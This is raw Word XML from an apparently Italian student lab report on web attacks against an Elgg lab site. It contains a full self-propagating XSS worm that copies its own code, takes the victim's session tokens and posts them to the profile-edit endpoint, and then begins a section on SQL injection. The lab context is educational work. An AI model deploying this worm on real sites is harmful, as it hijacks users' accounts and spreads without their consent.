          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="00E0E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C7A36A"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2.     window.onload = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D4F12D"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CC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> headerTag = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"&lt;script id=\"worm\" type=\"text/javascript\"&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493512C1"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var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> jsCode = document.getElementById(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"worm"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>).innerHTML;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141D53ED"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CC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> tailTag = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"&lt;/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"script&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44296E75"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4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// Put all the pieces together, and apply the URI encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047F63A9"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var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> wormCode = encodeURIComponent(headerTag + jsCode + tailTag);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261F061D"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8.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3A5776"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CC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> guid = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"&amp;guid="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> + elgg.session.user.guid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3A03F0"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DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> ts = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"&amp;__elgg_ts="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> + elgg.security.token.__elgg_ts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B5DF42"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DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> token = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"&amp;__elgg_token="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> + elgg.security.token.__elgg_token;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2442D559"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DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> name = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"&amp;name="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> + elgg.session.user.name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FF802A"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D4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// Construct the content of your url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE49404"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DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> sendurl = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"http://www.xsslabelgg.com/action/profile/edit"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720F1F3D"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15.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492E536E"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16.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11438EF0"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D4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// Set the content of the description field and access level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF36D8"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DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> desc = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"&amp;description=Samy is my hero"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>+ wormCode + token + ts+ guid ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1377FC60"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19.     desc += </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"&amp;accesslevel[description]=2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D19A4AC"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0.     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCF445B"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DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> samyGuid = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"59"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// FILL IN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397E4A39"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color w:val="DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> (elgg.session.user.guid != samyGuid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF24D84"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D4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>//Create and send Ajax request to modify profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36948E81"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DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="00E0E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2BC4A0"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5.     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="00E0E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Ajax</w:t>
      </w:r>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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="00E0E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36231F31"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6.     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="00E0E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.open(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"POST"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>,sendurl,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C707862"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7.     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="00E0E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.setRequestHeader(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"Content-Type"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C742CA"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8.     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"application/x-www-form-urlencoded"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5459E42C"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29.     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="00E0E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.send(desc);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17934CF2"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30.     }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FBAC0B"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31.     }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A03EA74"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 xml:space="preserve">32.     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="00E0E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4346306B" w14:textId="77777777" w:rsidR="009F304B" w:rsidRDefault="009F304B">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39810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>33.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58572040" w14:textId="2AB07F6C" w:rsidR="00E26038" w:rsidRDefault="00E26038" w:rsidP="009F304B"/>
    <w:p w14:paraId="24FB1228" w14:textId="77777777" w:rsidR="00430587" w:rsidRDefault="00430587" w:rsidP="009F304B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366FF1FB" w14:textId="77777777" w:rsidR="00430587" w:rsidRDefault="00430587" w:rsidP="00430587">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B196123" w14:textId="7ECD7553" w:rsidR="00430587" w:rsidRDefault="00E013DA" w:rsidP="00430587">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="282C14BB" wp14:editId="03B297DD">
            <wp:extent cx="5666990" cy="4870549"/>
            <wp:effectExtent l="152400" t="152400" r="353060" b="368300"/>
            <wp:docPr id="1367254795" name="Immagine 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4795" name="Immagine 8">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2944" t="26595" r="49769" b="1150"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5758152" cy="49488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012CD5" w14:textId="63E609F8" w:rsidR="00430587" w:rsidRDefault="00430587" w:rsidP="00430587">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65BEC1B1" wp14:editId="311F0903">
            <wp:extent cx="6174353" cy="2619251"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="961469182" name="Immagine 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9182" name="Immagine 9">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3226" r="16887" b="39747"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6223670" cy="2640172"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D399729" w14:textId="7791AA40" w:rsidR="005A6DE3" w:rsidRDefault="00A96D35" w:rsidP="00A96D35">
      <w:r>
        <w:t xml:space="preserve">Il profilo di Charlie sarà quindi infettato quando visiterà il profilo di Alice precedentemente </w:t>
      </w:r>
      <w:r w:rsidR="005A6DE3">
        <w:t>attaccato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3D47FF" w14:textId="77777777" w:rsidR="005A6DE3" w:rsidRDefault="005A6DE3">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="635DCA50" w14:textId="36BB4527" w:rsidR="00A17DA0" w:rsidRPr="00A17DA0" w:rsidRDefault="00975DDE" w:rsidP="00A17DA0">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc140165784"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.4 SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="7F002E12" w14:textId="20275A06" w:rsidR="009652AB" w:rsidRDefault="00A17DA0" w:rsidP="00A17DA0">
      <w:pPr>
        <w:pStyle w:val="Nessunaspaziatura"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A17DA0">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>L' SQL injection è una tecnica di attacco informatico che sfrutta la vulnerabilità di un'applicazione web per inserire del codice SQL malevolo all'interno di una query che verrà eseguita dal database. In questo modo, un attaccante può ottenere informazioni sensibili dal database, modificare o cancellare dati, o addirittura assumere il controllo dell'intero sistema. L'attacco viene di solito eseguito attraverso l'inserimento di input non controllati in un campo di input dell'applicazione, che viene poi interpretato come parte della query SQL da eseguire dal database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FF01B2" w14:textId="77777777" w:rsidR="00E32C79" w:rsidRPr="00E32C79" w:rsidRDefault="00E32C79" w:rsidP="00E32C79">
      <w:pPr>
        <w:pStyle w:val="Nessunaspaziatura"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E32C79">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Le possibili soluzioni per prevenire gli attacchi di SQL injection sono:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F0F603" w14:textId="77777777" w:rsidR="00E32C79" w:rsidRPr="00E32C79" w:rsidRDefault="00E32C79" w:rsidP="00E32C79">
      <w:pPr>
        <w:pStyle w:val="Nessunaspaziatura"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C1A9D97" w14:textId="32442568" w:rsidR="00E32C79" w:rsidRPr="00E32C79" w:rsidRDefault="00E32C79" w:rsidP="00E32C79">
      <w:pPr>
        <w:pStyle w:val="Nessunaspaziatura"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
